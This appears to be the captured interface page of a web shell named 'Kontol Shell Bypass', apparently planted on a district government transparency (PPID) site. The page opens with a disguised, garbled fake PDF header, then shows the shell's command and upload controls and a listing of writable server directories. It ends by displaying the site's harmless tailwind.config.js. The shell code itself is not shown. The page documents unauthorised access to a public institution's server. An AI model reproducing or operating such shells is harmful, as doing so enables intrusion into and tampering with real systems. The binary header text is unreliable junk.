%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/new-ppid-app/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/new-ppid-app/tailwind.config.js
/**
 * Konfigurasi Tailwind CSS (build statis) — PPID Kabupaten Mamuju Tengah.
 *
 * Menggantikan CDN cdn.tailwindcss.com. Menghasilkan CSS terkompilasi + purge ke
 * assets/css/app.css (lihat package.json → "build:css" / "dev").
 *
 * PENTING: `content` harus mencakup SEMUA file yang memuat nama class Tailwind,
 * jika tidak, class-nya akan ter-purge dan gaya hilang.
 */
/** @type {import('tailwindcss').Config} */
module.exports = {
  darkMode: 'class',
  content: [
    './*.php',
    './partials/**/*.php',
    './includes/**/*.php',
    './admin/**/*.php',
    './lang/*.php',
  ],
  theme: {
    extend: {
      colors: {
        mateng: { green: '#15803d', blue: '#0369a1', gold: '#ca8a04', dark: '#0f172a' },
      },
      fontFamily: {
        sans: ['Inter', 'sans-serif'],
      },
    },
  },
  // Jaring pengaman: class yang di-set via JS (classList) atau diteruskan sebagai
  // string dinamis di PHP, sehingga mungkin tak terdeteksi pemindai konten.
  safelist: [
    'hidden',
    'opacity-0',
    'translate-y-3',
    'pointer-events-none',
    'rotate-45',
    '-translate-x-full',
    // Ukuran bintang pada render_stars($size).
    'text-xs', 'text-sm', 'text-base', 'text-lg', 'text-xl', 'text-2xl',
  ],
}

Kontol Shell Bypass